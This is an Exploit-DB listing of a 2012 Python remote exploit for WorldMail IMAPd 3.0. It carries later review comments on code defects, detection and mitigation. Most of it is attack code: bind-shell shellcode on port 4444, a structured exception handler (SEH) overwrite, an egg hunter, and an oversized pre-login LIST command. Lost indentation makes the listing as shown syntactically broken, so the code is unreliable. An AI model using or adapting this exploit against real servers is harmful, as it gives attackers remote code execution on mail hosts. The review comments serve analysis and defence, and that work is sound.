WorldMail IMAPd 3.0 – Remote Overflow (SEH) (Egghunter)

  • 作者: TheXero
    日期: 2012-01-12
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/18354/
  • #!/usr/bin/env python
    # -*- coding: latin-1 -*- # ####################################################
    #____ _ __ #
    # _____ __/ / /__ ___ ______ ______(_) /___ __ #
    #/ _ \/ // / / (_-</ -_) __/ // / __/ / __/ // / #
    # /_//_/\_,_/_/_/___/\__/\__/\_,_/_/ /_/\__/\_, /#
    #/___/ nullsecurity team #
    ##
    # wm-imapd.py - WorldMail IMAPD remote exploit #
    ##
    # DATE #
    # 09/01/2012 #
    ##
    # DESCRIPTION#
    # WorldMail IMAPD - SEH overflow - remote exploit#
    ##
    # AUTHOR #
    # TheXero - http://www.nullsecurity.net/ #
    ##
    ################################################################################
    
    import sys
    import socket
    
    ## Exploit Title: WorldMail imapd 3.0 SEH overflow (egg hunter)
    ## Tested on: XP SP3 en-us
    ## Author: TheXero
    ## Website: www.thexero.co.uk
    ## http://www.nullsecurity.net
    
    ## Check for parameters
    # NOTE(review): `print "..."` is Python 2 statement syntax, so this file does
    # not run under Python 3. The two body lines of this `if` (the print and the
    # quit()) have lost their indentation in this listing; as shown it is a
    # SyntaxError under any Python version.
    if len(sys.argv) != 3:
    print "Usage: " + sys.argv[0] + " 127.0.0.1 143"
    quit()
    
    ## Assigns the parameters
    # Host and port come straight from argv; int() raises ValueError (uncaught)
    # on a non-numeric port.
    target = sys.argv[1]
    port = int(sys.argv[2])
    
    ## Sets up the socket
    # Plain TCP socket; no timeout is set, so a non-responding host blocks forever.
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    
    ## Sets the variables
    # `char` is the single byte placed at both ends of the LIST argument.
    char = "}"
    # nseh / seh are the two four-byte SEH record fields; the handler address is
    # the one the author's comment attributes to mailcmn.dll on the "Tested on"
    # platform above, so it is specific to that build and OS.
    nseh = "\xeb\x06\x90\x90"
    seh = "\x4e\x3b\x01\x10" ## 10013B4E|. 59 POP ECX mailcmn.dll
    # Dead assignment: `buffer` is reassigned below before it is ever read.
    # It also shadows the Python 2 builtin `buffer`.
    buffer = '\x90' * 8
    # The leading "T00WT00W" is the 8-byte tag the hunter below scans for
    # (0x54 0x30 0x30 0x57 = "T00W" appears in `hunter`). The author labels the
    # remaining bytes a bind shell on port 4444; they are opaque here and not
    # verifiable from this listing.
    shellcode = ("T00WT00W" ## Bindshell port 4444
    "\xbd\xe8\x39\x05\xa5\xdb\xdb\xd9\x74\x24\xf4\x58\x29\xc9\xb1"
    "\x56\x31\x68\x13\x03\x68\x13\x83\xc0\xec\xdb\xf0\x59\x04\x92"
    "\xfb\xa1\xd4\xc5\x72\x44\xe5\xd7\xe1\x0c\x57\xe8\x62\x40\x5b"
    "\x83\x27\x71\xe8\xe1\xef\x76\x59\x4f\xd6\xb9\x5a\x61\xd6\x16"
    "\x98\xe3\xaa\x64\xcc\xc3\x93\xa6\x01\x05\xd3\xdb\xe9\x57\x8c"
    "\x90\x5b\x48\xb9\xe5\x67\x69\x6d\x62\xd7\x11\x08\xb5\xa3\xab"
    "\x13\xe6\x1b\xa7\x5c\x1e\x10\xef\x7c\x1f\xf5\xf3\x41\x56\x72"
    "\xc7\x32\x69\x52\x19\xba\x5b\x9a\xf6\x85\x53\x17\x06\xc1\x54"
    "\xc7\x7d\x39\xa7\x7a\x86\xfa\xd5\xa0\x03\x1f\x7d\x23\xb3\xfb"
    "\x7f\xe0\x22\x8f\x8c\x4d\x20\xd7\x90\x50\xe5\x63\xac\xd9\x08"
    "\xa4\x24\x99\x2e\x60\x6c\x7a\x4e\x31\xc8\x2d\x6f\x21\xb4\x92"
    "\xd5\x29\x57\xc7\x6c\x70\x30\x24\x43\x8b\xc0\x22\xd4\xf8\xf2"
    "\xed\x4e\x97\xbe\x66\x49\x60\xc0\x5d\x2d\xfe\x3f\x5d\x4e\xd6"
    "\xfb\x09\x1e\x40\x2d\x31\xf5\x90\xd2\xe4\x5a\xc1\x7c\x56\x1b"
    "\xb1\x3c\x06\xf3\xdb\xb2\x79\xe3\xe3\x18\x0c\x23\x2a\x78\x5d"
    "\xc4\x4f\x7e\x70\x48\xd9\x98\x18\x60\x8f\x33\xb4\x42\xf4\x8b"
    "\x23\xbc\xde\xa7\xfc\x2a\x56\xae\x3a\x54\x67\xe4\x69\xf9\xcf"
    "\x6f\xf9\x11\xd4\x8e\xfe\x3f\x7c\xd8\xc7\xa8\xf6\xb4\x8a\x49"
    "\x06\x9d\x7c\xe9\x95\x7a\x7c\x64\x86\xd4\x2b\x21\x78\x2d\xb9"
    "\xdf\x23\x87\xdf\x1d\xb5\xe0\x5b\xfa\x06\xee\x62\x8f\x33\xd4"
    "\x74\x49\xbb\x50\x20\x05\xea\x0e\x9e\xe3\x44\xe1\x48\xba\x3b"
    "\xab\x1c\x3b\x70\x6c\x5a\x44\x5d\x1a\x82\xf5\x08\x5b\xbd\x3a"
    "\xdd\x6b\xc6\x26\x7d\x93\x1d\xe3\x8d\xde\x3f\x42\x06\x87\xaa"
    "\xd6\x4b\x38\x01\x14\x72\xbb\xa3\xe5\x81\xa3\xc6\xe0\xce\x63"
    "\x3b\x99\x5f\x06\x3b\x0e\x5f\x03")
    
    ## Calculates the size of junk depending on the shellcode
    # Pads so that junk + shellcode is always exactly 769 bytes; if the
    # shellcode were longer than 769 bytes the multiplier goes negative and
    # `junk` silently becomes empty.
    junk = "\x41" * (769 - len(shellcode))
    
    ## Egg Hunter
    # 32 bytes (14 + 18). Contains the "T00W" tag bytes it searches for.
    hunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05"
    "\x5a\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
    
    ## Assembles the buffer
    # Total length: 1 + 769 + 4 + 4 + 32 + 1 = 811 bytes. For defenders: a LIST
    # argument of this size, largely 0x41 filler and non-printable bytes, is far
    # outside normal IMAP LIST usage (a reference name plus a mailbox pattern)
    # and is a reasonable thing for an IMAP-aware IDS or proxy to alert on.
    buffer = char + junk + shellcode + nseh + seh + hunter + char
    
    ## Connects
    # Reads the server greeting (the result is never used), sends one
    # unauthenticated LIST command, and closes. Nothing here is wrapped in
    # try/except, so a refused or reset connection raises socket.error uncaught.
    # The command is sent pre-login, so authentication is not a mitigating
    # control for this service; patching/retiring the 2012-era daemon and not
    # exposing port 143 are.
    s.connect((target,port))
    data=s.recv(1024)
    s.send("a001 LIST " + buffer + "\r\n")
    s.close()
    
    # EOF